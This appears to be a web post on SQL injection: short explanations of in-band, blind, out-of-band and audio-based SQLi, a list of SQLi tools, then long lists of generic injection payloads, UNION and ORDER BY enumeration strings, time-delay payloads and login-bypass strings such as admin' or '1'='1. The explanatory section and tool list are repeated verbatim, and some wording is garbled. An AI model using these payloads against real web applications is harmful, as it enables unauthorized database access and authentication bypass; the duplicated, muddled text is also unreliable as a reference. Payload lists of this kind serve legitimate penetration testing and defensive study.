SQL injection is a web security vulnerability that allows an attacker to interfere with queries an application makes to its database. It often allows attackers to see data they wouldn't normally have access to. Includes data belonging to the user or any other data accessible to the application itself. In many cases, an attacker can modify or delete this data, causing persistent changes to the content or behavior of the application.
Types of SQL injection:
In-band SQLi (Classic SQLi): In-band SQLi is the most popular and easiest to exploit SQL injection attack method. In-band SQL injection occurs when an attacker can use the same communication channel to launch an attack and collect the results. The two most common types of SQL injection are error-based SQLi and union-based SQLi.
Error-based SQLi: Error-based SQLi is an in-band SQL technology that relies on error messages issued by the database server to obtain information about the database structure. In some cases, error-based SQL injection alone is enough to allow an attacker to enumerate an entire database.
Union-based SQLi: Union-based SQLi is an in-band SQL injection technique that uses the SQL UNION operator to combine the results of two or more SELECT statements into a single result that is then returned as part of the HTTP response.
SQLi Inference (Blind SQLi): Unlike in-band SQL, SQLi inference may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL injection. In a SQLi inference attack, no data is actually transferred through the web application, and the attacker will not be able to see the results of the in-band attack (which is why this type of attack is often called a "blind SQL injection attack". Instead, the attacker can Send the payload and observe the response of the web application and the output of the database server to reconstruct the database structure. The two types of inference SQL injection are blind Boolean-based SQLi and blind time-based SQLi.
Boolean-based (content-based) blind SQLi: Boolean-based SQL injection is a speculative SQL injection technique based on sending a SQL query to the database, forcing the application to return different results depending on whether the query returns TRUE or false. Depending on the result, the content in the HTTP response will change or remain unchanged. This allows an attacker to infer whether the payload used returns true or false, even if no data from the database is returned.
Time-based blind SQLi: Time-based SQL injection is a speculative SQL injection technique based on sending a SQL query to the database, forcing the database to wait for a specific amount of time (in seconds) before responding. The response time will tell the attacker whether the query result is TRUE or FALSE. Depending on the result, the HTTP response will be returned delayed or immediately. This allows an attacker to infer whether the payload used returns true or false, even if no data from the database is returned.
Out-of-band SQLi: Out-of-band SQL injection is uncommon, mainly because it depends on features enabled on the database server used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch an attack and collect the results. Out-of-band techniques provide attackers with an alternative to inference time-based techniques, especially if the server response is not very stable (inference time-based attacks are unreliable).
Audio-based Sql injection: This is a SQL injection attack method that can be applied to applications that use voice commands to provide database access. An attacker can obtain information from the database by sending a SQL query with audio.
SQL injection vulnerability scanning tool:
SQLMap – Automatic SQL injection and database scanning tool
jSQL Injection – Java tool for automatic SQL injection
BBQSQL – Blind SQL Injection Vulnerability
NoSQLMap – Automatic retrieval of NoSQL databases
Whitewidow – SQL vulnerability scanner
DSSS – Small SQLi Vulnerability Scanner
explore – Web vulnerability testing format
Blind-Sql-Bitshifting – Blind SQL injection via Bitshifting
Leviathan – Extensive quality testing toolkit
Blisqy – Exploiting time-based blind SQL injection in HTTP headers (MySQL/MariaDB)
Generic SQL injection payload
Payload SQL injection bypass
Types of SQL injection:
In-band SQLi (Classic SQLi): In-band SQLi is the most popular and easiest to exploit SQL injection attack method. In-band SQL injection occurs when an attacker can use the same communication channel to launch an attack and collect the results. The two most common types of SQL injection are error-based SQLi and union-based SQLi.
Error-based SQLi: Error-based SQLi is an in-band SQL technology that relies on error messages issued by the database server to obtain information about the database structure. In some cases, error-based SQL injection alone is enough to allow an attacker to enumerate an entire database.
Union-based SQLi: Union-based SQLi is an in-band SQL injection technique that uses the SQL UNION operator to combine the results of two or more SELECT statements into a single result that is then returned as part of the HTTP response.
SQLi Inference (Blind SQLi): Unlike in-band SQL, SQLi inference may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL injection. In a SQLi inference attack, no data is actually transferred through the web application, and the attacker will not be able to see the results of the in-band attack (which is why this type of attack is often called a "blind SQL injection attack". Instead, the attacker can Send the payload and observe the response of the web application and the output of the database server to reconstruct the database structure. The two types of inference SQL injection are blind Boolean-based SQLi and blind time-based SQLi.
Boolean-based (content-based) blind SQLi: Boolean-based SQL injection is a speculative SQL injection technique based on sending a SQL query to the database, forcing the application to return different results depending on whether the query returns TRUE or false. Depending on the result, the content in the HTTP response will change or remain unchanged. This allows an attacker to infer whether the payload used returns true or false, even if no data from the database is returned.
Time-based blind SQLi: Time-based SQL injection is a speculative SQL injection technique based on sending a SQL query to the database, forcing the database to wait for a specific amount of time (in seconds) before responding. The response time will tell the attacker whether the query result is TRUE or FALSE. Depending on the result, the HTTP response will be returned delayed or immediately. This allows an attacker to infer whether the payload used returns true or false, even if no data from the database is returned.
Out-of-band SQLi: Out-of-band SQL injection is uncommon, mainly because it depends on features enabled on the database server used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch an attack and collect the results. Out-of-band techniques provide attackers with an alternative to inference time-based techniques, especially if the server response is not very stable (inference time-based attacks are unreliable).
Audio-based Sql injection: This is a SQL injection attack method that can be applied to applications that use voice commands to provide database access. An attacker can obtain information from the database by sending a SQL query with audio.
SQL injection vulnerability scanning tool:
SQLMap – Automatic SQL injection and database scanning tool
jSQL Injection – Java tool for automatic SQL injection
BBQSQL – Blind SQL Injection Vulnerability
NoSQLMap – Automatic retrieval of NoSQL databases
Whitewidow – SQL vulnerability scanner
DSSS – Small SQLi Vulnerability Scanner
explore – Web vulnerability testing format
Blind-Sql-Bitshifting – Blind SQL injection via Bitshifting
Leviathan – Extensive quality testing toolkit
Blisqy – Exploiting time-based blind SQL injection in HTTP headers (MySQL/MariaDB)
Generic SQL injection payload
Code:
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
+ addition, concatenate (or space in url)
|| (double pipe) concatenate
% wildcard attribute indicator
@variable local variable
@@variable global variable
# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Finding the table name
Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--
Comments:
# Hash comment
/* C-style comment
-- - SQL comment
;%00 Nullbyte
` BacktickPayload SQL injection bypass
Code:
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
